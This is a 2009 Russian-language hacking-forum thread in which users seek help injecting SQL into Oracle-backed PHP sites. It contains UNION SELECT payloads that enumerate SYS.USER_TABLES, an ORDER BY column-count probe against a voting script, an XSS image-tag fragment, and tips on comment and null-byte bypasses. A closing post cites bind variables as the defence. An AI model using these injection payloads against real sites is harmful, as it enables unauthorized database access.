Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.02.2009, 11:54
|
|
Banned
Регистрация: 12.07.2008
Сообщений: 206
Провел на форуме:
801258
Репутация:
33
|
|
Напоролся на такую шнягу,подскажите как дальше
Warning: oci_execute() [function.oci-execute]: ORA-01460: unimplemented or unreasonable conversion requested in /usr/local/apache2/htdocs/cms_adm/lib/site/Oracle.class.php on line 86
array (
0 => '"> http://******.ru/trye.asp?sessionID="><IMG%20SRC="javascript :alert( );',
1 => '',
) |
|
|
11.02.2009, 12:31
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Интересный факт, не знаю на сколько будет полезно но: запрос
www.site.com/view.php?id=-1+union+select+null, table_name, null, null+from+sys.user_tables+where+rownum+<=+5--
выдавал пустую страничкy, а запрос
www.site.com/view.php?id=-1+UNION+SELECT+null, TABLE_Name, null, null+FROM+SYS.USER_TABLES+WHERE+ROWNUM+<=+5--
выводил нужную информацию на страничкy
З.Ы. Спасибо за предоставленую инфу по ораклу...
|
|
|
|
01.04.2009, 01:02
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
eсть вот такая вещь, как с ней бороться??Как подобрать кол-во столбцов?
BD Oracle
получил с помощбю post запроса www.site.ru/vote/statistic.php?lang=kaz&vote=1&question_id=1122031291')--+&answer_id=1122031391&vote_bt.x=21&vote_bt.y=11
Warning: ociexecute() [function.ociexecute]: ORA-01785: ORDER BY item must be the number of a SELECT-list expression in /export/htdocs/oracle.php on line 48
SELECT * FROM voting_questions WHERE id = '1122031291\' order by 99999--'
Warning: ocifetchinto() [function.ocifetchinto]: ORA-24374: define not done before fetch or execute and fetch in /export/htdocs/oracle.php on line 56
буду ОЧЕНЬ признателен за помощь!
|
|
|
|
04.04.2009, 12:16
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
это вообще за инъекцию сойдёт???Как можно подобрать кол-во колонок?
|
|
|
|
04.04.2009, 16:03
|
|
Познающий
Регистрация: 28.10.2008
Сообщений: 43
Провел на форуме:
117557
Репутация:
125
|
|
У тебя комментирование "--" запроса не прошло. Скул говорит, что "group by 99999--" - должно быть целым числом, а не с "--". Попробуй "/*" и нулл-байт %00, мало ли.
|
|
|
|
18.10.2009, 09:13
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131
Репутация:
1695
|
|
Вообще, я удивлен, наличием php скриптов с sql инъекцией под оракл... нужно сильно постараться написать такой код, когда есть функция OCIBindByName, использование которой сводит возможность инъекции на нет.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
